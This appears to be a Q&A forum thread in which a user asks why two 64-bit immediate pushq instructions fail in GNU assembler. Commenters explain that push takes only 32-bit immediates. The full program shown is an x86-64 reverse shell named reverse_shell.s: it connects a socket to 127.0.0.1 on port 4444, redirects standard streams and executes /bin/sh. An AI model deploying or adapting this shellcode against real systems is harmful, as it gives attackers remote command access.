# "Error: operand type mismatch for 'push'" for 2 of 4 identical push instructions

Tags: assembly, gcc, stack, 64-bit, att

so I'm using gas assembly and I'm running this code:

```
main:
    # create data section on stack
    pushq $0x0000000000000000
    pushq $0x000000007f000001
    pushq $0x115c02000068732f
    pushq $0x6e69622f00000000
```

and when I compile I get the following errors:

```
reverse_shell.s: Assembler messages:
reverse_shell.s:20: Error: operand type mismatch for `push'
reverse_shell.s:21: Error: operand type mismatch for `push'
```

so lines 20 and 21 correspond with the last 2 pushq calls. It seems that all of them are the same operand, a 64 bit immediate in hex, but the first 2 work and the second 2 don't, why?
Note that if I isolate each one by commenting out the rest of them, I get the same results, lines 20 and 21 fail when isolated and lines 18 and 19 pass

I don't think this pertains, but here is my full code in case it matters:

```
.data
cur_fd:
    .int 0
shell_str: 
    .asciz "/bin/sh"
sin_family:
    .hword 2
sin_port:
    .hword 23569
s_addr: 
    .int 0x0100007f
sin_zero: 
    .zero 8
.text
    .globl main
main:
    # create data section on stack
    pushq $0x0000000000000000
    pushq $0x000000007f000001
    pushq $0x115c02000068732f
    pushq $0x6e69622f00000000

    xor %rax, %rax

    mov $2, %rdi #AF_INET
    mov $1, %rsi #SOCK_STREAM
    mov $0, %rdx
    mov $41, %rax
    syscall

    mov %eax, 0(%rsp)

    mov %rax, %rdi
    mov %rsp, %rsi
    add $12, %rsi
    mov $16, %rdx
    mov $42, %rax
    syscall

    xor %rdi, %rdi
    mov 0(%rsp), %edi
    mov $0, %rsi
    mov $33, %rax
    syscall

    xor %rdi, %rdi
    mov 0(%rsp), %edi
    mov $1, %rsi
    mov $33, %rax
    syscall

    xor %rdi, %rdi
    mov 0(%rsp), %rdi
    mov $2, %rsi
    mov $33, %rax
    syscall

    xor %rdi, %rdi
    mov %rsp, %rdi
    add $4, %rdi
    mov $0, %rsi
    mov $0, %rdx
    mov $59, %rax
    syscall
loop:
    jmp loop
```

Comment: The first two pushes use a 32-bit immediate. The leading zeroes don't change the size.

Comment: ohh I see, thank you. is there any way to use 64 bit immediates? I tried this using multiple push calls with 32 bit immediates, but it added 32 bit 0 padding between each of the values on the stack

Comment: You cannot push a 64-bit immediate. You have to load it into a register and push the register.

Comment: Thank you! thanks to this answer I was able to finish my program. I will accept an answer if one of you guys writes one